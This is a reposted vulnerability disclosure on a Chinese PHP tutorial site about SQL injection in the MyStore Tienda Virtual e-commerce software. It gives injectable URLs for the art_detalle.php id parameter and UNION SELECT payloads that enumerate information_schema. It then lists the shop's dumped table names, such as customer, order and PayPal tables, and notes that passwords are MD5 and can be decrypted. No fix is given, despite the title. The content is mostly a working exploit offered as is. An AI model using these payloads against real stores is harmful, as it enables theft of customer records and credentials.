网站地图    收藏   

主页 > 后端 > 网站安全 >

MyStore Tienda Virtual SQL注射缺陷及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: SQL Injection MyStore Tienda Virtual |作者: Arturo Zamora Arturo_zamora_c@hotmail.com |开发者: MyStore Tienda Virtual http://www.mystore.com.mx/ |测试方法 :==================......

标题: SQL Injection MyStore Tienda Virtual                                    | 
作者: Arturo Zamora   Arturo_zamora_c@hotmail.com                                             | 
开发者: MyStore Tienda Virtual http://www.mystore.com.mx/                       | 
测试方法  : 
 
====================== 
 
 
http://www.2cto.com /path/art_detalle.php?id={sqli} 
 
  
====================== 
 
示例 
 
====================== 
 
  
 
http://www.2cto.com /path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13-- 
 
  
 
http://www.2cto.com /path/art_detalle.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- 
 
   
 
====================== 
 
dbs: 
 
====================== 
 
articulos    
 
articulos_nivel3     
 
articulos_relacionados   
 
articulos_secciones      
 
atajada      
 
atajadausa   
 
ayuda    
 
ayudausa     
 
banners      
 
banners_conteo   
 
banners_lateral      
 
banners_lateralusa   
 
basket   
 
campania     
 
clientesclientes_envio   
 
clientes_facturacion     
 
colores      
 
comentario   
 
comisionistas    
 
comisionistas_hits   
 
comisionistas_modulos    
 
contacto     
 
descuentos   
 
descuentos_cruzados      
 
descuentos_temp      
 
especificacion   
 
home     
 
homeusa      
 
justin   
 
justinusa    
 
mensajeria   
 
mensajeriausa    
 
mixer    
 
newsletter   
 
newsletter_mensaje   
 
nivel1   
 
nivel2   
 
nivel3   
 
parametros   
 
paypal 
 
pedidos      
 
pedidos_detalle      
 
pedidos_detalleusa   
 
pedidosusa   
 
remate   
 
remateusa    
 
secciones    
 
shopper 
 
sol_info     
 
talisman     
 
tallas   
 
ticker   
 
tickerusa    
 
visitas 
 
  
 
====================== 
 
Information : 
 
====================== 
 
   
 
password decrypt md5 
 
    
 
====================== 
 
    
 
I Love U Pumosita 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论